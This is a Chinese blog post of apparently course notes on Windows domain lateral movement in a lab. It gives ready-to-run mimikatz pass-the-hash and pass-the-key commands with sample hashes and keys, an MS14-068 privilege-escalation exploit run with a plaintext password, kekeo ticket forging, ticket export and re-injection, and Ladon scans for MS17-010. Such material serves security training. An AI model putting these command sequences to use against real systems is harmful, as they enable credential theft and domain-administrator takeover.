内网安全-域横向PTH&PTK&PTT哈希票据传递

已于 2022-03-14 15:02:02 修改
阅读量1k 收藏 1
点赞数
分类专栏: 渗透笔记2 文章标签: 安全
于 2022-03-14 15:01:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhscxj/article/details/123433436
版权

在这里插入图片描述

PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试
PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试
PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试

pth:没打补丁用户都可以连接,打了补丁只能 administrator 连接
ptk:打了补丁才能用户都可以连接,采用 aes256 连接

在这里插入图片描述

案例 1-域横向移动 PTH 传递-mimikatz

PTH ntlm 传递

未打补丁下的工作组及域连接:
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
\\OWA2010CN-God.god.org

mimikatz查询出本机NTLM后,通过本机的NTLM值连接域内其它主机(如果设置的密码相同,即可连上)
在这里插入图片描述执行后,弹出一个cmd窗口,可输入对应要连接主机的ip,连接并执行命令(可对内网存活主机的ip依次进行测试)
在这里插入图片描述

案例 2-域横向移动 PTK 传递-mimikatz

对方主机必须打了补丁,用户才可连接
通过mimikatz获取aes256值后,进行连接

PTK aes256 传递
打补丁后的工作组及域连接:
sekurlsa::ekeys #获取 aes

sekurlsa::pth /user:mary /domain:god
/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

在这里插入图片描述

案例 3-域横向移动 PTT 传递-ms14068&kekeo&本地

#PTT 攻击的部分就不是简单的 NTLM 认证了,它是利用 Kerberos 协议进行攻击的,这里就介绍三种
常见的攻击方法:MS14-068,Golden ticket,SILVER ticket,简单来说就是将连接合法的票据注入到
内存中实现连接。
MS14-068 基于漏洞,Golden ticket(黄金票据),SILVER ticket(白银票据)
其中 Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术
MS14-068 造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是
kb3011780

第一种利用漏洞:

能实现普通用户直接获取域控 system 权限


#MS14-068 powershell 执行
1.查看当前 sid whoami/user

2.mimikatz # kerberos::purge
清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list  查看当前机器凭证
mimikatz # kerberos::ptc 票据文件  将票据注入到内存中

3.利用 ms14-068 生成 TGT 数据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -
p admin!@#45

4.票据注入内存
mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit

5.查看凭证列表 klist

6.利用
dir \\192.168.3.21\c$

当获取到并连接域中的一个普通用户时,获取本地sid值
在这里插入图片描述
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
通过MS14-068执行后会生成一个TGT开头的文件(票据)
在这里插入图片描述
通过mimikaze将生成的票据注入到内存中,可通过klist命令查看
在这里插入图片描述
查看域控制器名字,直接进行连接

在这里插入图片描述
在这里插入图片描述
第二种利用工具 kekeo

1.生成票据
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"
2.导入票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看凭证 klist
4.利用 net use 载入
dir \\192.168.3.21\c$

运行kekeo执行命令后生成一个kirbi后缀文件
在这里插入图片描述
导入生成的kirbi文件票据,导入后直接连接
在这里插入图片描述

第三种利用本地票据(需管理权限)

利用mimikatz导出以前建立连接过的票据
再把以前连接过的票据重新导入,去连接尝试

sekurlsa::tickets /export
kerberos::ptt xxxxxxxxxx.xxxx.kirbi

导出以前建立过连接的票据
在这里插入图片描述
将导出的票据重新导入,尝试连接
在这里插入图片描述

总结:ptt 传递不需本地管理员权限,连接时主机名连接,基于漏洞,工具,本地票据

案例 4-国产 Ladon 内网杀器测试验收

信息收集-协议扫描-漏洞探针-传递攻击等

扫描在线主机
在这里插入图片描述
检测网段中是否存在ms17010漏洞
在这里插入图片描述
扫描网段中是否开发445端口,可以进行smbscan的连接

在这里插入图片描述
连接192.168.3.21主机
在这里插入图片描述

深白色耳机
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第68天:内网安全-横向PTH&PTK&PTT哈希票据传递1
08-03
2.mimikatz # kerberos::purge 3.利用 ms14-068 生成 TGT 数据 4.票据注入内存 5.查看凭证列表 klist 6.利
内网安全横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射
今天是几号的博客
03-27 1239
PTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。如果禁用了ntlm认证,PsExec无法利用获得的ntlm hash进行远程连接,但是使用mimikatz还是可以攻击成功。对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012等,可以使用AES keys代替NT hash来实现ptk攻击,总结:KB2871997补丁后的影响。
内网横向PTH&PTK&PTT哈希票据传递
mingyqf的博客
11-12 3980
内网横向PTH&PTK&PTT哈希票据传递 Kerberos 协议具体工作方法,在中,简要介绍一下:  客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用 krbtgt 密码 hash 作为密钥),发送给 kdc(控),kdc 对用户进行检 测,成功之后创建 TGT(Ticket-Granting Ticket)  将 TGT 进行加密签名返回给客户机器,只有用户 krbtgt 才能读 取 kerberos 中 TGT 数据  然后客户机将 TGT 发送给
68 内网安全-横向PTH&PTK&PTT哈希票据传递
山兔的博客
10-31 571
我在的计算机有连接过控,那么他就会有一些类似的储存缓存行为文件在我的计算机上面,把以前的一些凭据文件给导出来,然后在把之前跟控建立连接的文件,给导入到内存里面去,相当于说把以前你的cookie把他搂出来,去尝试这个cookie,他是不是还可以用,这个攻击需要本地管理员权限,因为他涉及到导出票据,所以说你的权限不够的话,这个攻击是做不了的,前面那两个就不需要权限。MS14-068利用的是PTT攻击,这里就涉及到三类攻击技巧,一种是用漏洞生成的,一种是用工具生成的,还有一种本地生成的。
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
rfb-face-mask.pth
08-09
面部表情识别模型权重 https://github.com/Whiffe/PyTorch-Facial-Expression-Recognition
exp-schp-201908301523-atr.pth
04-16
Self-Correction-Human-Parsing SCHP models exp-schp-201908301523-atr.pth
vox-cpk.pth.tar
09-16
https://gitee.com/nbodyfun/Real_Time_Image_Animation
GPEN-BFR-512-D.pth
04-18
GPEN-BFR-512-D.pth
mimikatz的使用
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-15 3万+
mimikatz的下载地址 , 提取码是 kcuh mimikatz是个好东西,它的功能很多,最重要的是能获取windows的账号及明文密码 使用方法: 1:远程连接使用 控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 这里抓到了administrator的账号,密码是null,说明没设密码 注意: 1、 文件夹里有两个版本,一个是对应32位系统的,一个是64位系
用户密码收集
m0_65554829的博客
11-22 65
通过mimikaze获取本地用户密码和通过rdp进行横向移动
内攻击方法
wuxinweii的博客
11-30 3626
环境: 攻击方法:伪造信任票据 一、获取子和父的SID 以及信任密钥 mimikaze中有此功能 在mimikaze输入:lsadump::trust /patch 指向分别为 林和子的SID以及双方的信任密钥 二、通过SID以及信任密钥伪造信任密钥 在mimikatz中输入: "kerberos::golden /domain:[当前所在] /sid:[当前的SID] /sids:[当前的sid-519] /rc4:[信任密钥 /user:[将权限赋予谁] /service:[需要访问
票据传递攻击与防范
weixin_45007073的博客
07-11 727
票据传递前言使用mimikatz进行票据传递 前言 之前我们在哈希传递篇就介绍到,要想使用mimikatz的哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)。 使用mimikatz进行票据传递 我们首先使用mimikatz将内存中的票据导出。执行完以上命令后,会在当前目录下出现多个服务的票据文件,如krbtgt、cifs、ldap mim
内网渗透之横向移动PTH&PTT&PTK
m0_62207170的博客
04-23 909
内网渗透之横向移动PTH&PTT&PTK
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4242
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTHPTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
windows内网渗透PTH/PTK攻击
ATpiu的博客
07-18 6183
前言 windows内网渗透中,有三种最常用的pass系列攻击: pass the hash(hash传递攻击,简称pth) pass the ticket(票据传递攻击,简称ptt) pass the key(密钥传递攻击,简称ptk) 1.1 pass the hash攻击 1.1.1 NTLM HASH windows用户hash主要由以下部分组成,其中NTLM-HASH比LM-HASH的安全性要更高: 用户名称:RID:LM-HASH值:NTLM-HASH值 自Windows Vista和Wi
5.内网渗透之PTH&PTT&PTK
weixin_30791095的博客
02-08 1335
---------------------------------------------- 本文参考自三好学生-渗透系列文章 内网渗透之PTH&PTT&PTK PTH(pass-the-hash) pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。...
PTH攻击总结
systemino的博客
05-26 2563
搞过内网渗透的,你肯定听过pth攻击。这种攻击效果非常显著,微软也是因此在存储凭证方面做了很大的改变。但即使是不断的更新,发布补丁,pth攻击还是存在。今天我们就来一探究竟。 目录 ·pth攻击回顾 ·微软更新 ·hash和NTLM介绍 ·Pth攻击原理 ·Zeros取代LM hash ·实际中的配置 ·pth攻击 ·Mimikatz ·SMB pth攻击 · msf scanner/smb/smb_login · Empire lateral_moveme...
渗透利用WIMC进行PTH攻击
Longwaer
01-20 907
学习掌握windows自带WIMC,更好的在内网环境中进行信息收集等操作。
6_hp-karaoke-uvr.pth
最新发布
01-30
6_hp-karaoke-uvr.pth 是一个文件名,它代表了一种特定的文件格式。6_hp-karaoke-uvr.pth 文件可能是一个经过压缩或编码的音频文件,用于卡拉OK或歌曲演唱的目的。 .pth 是文件扩展名的一种常见形式,通常会提示该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值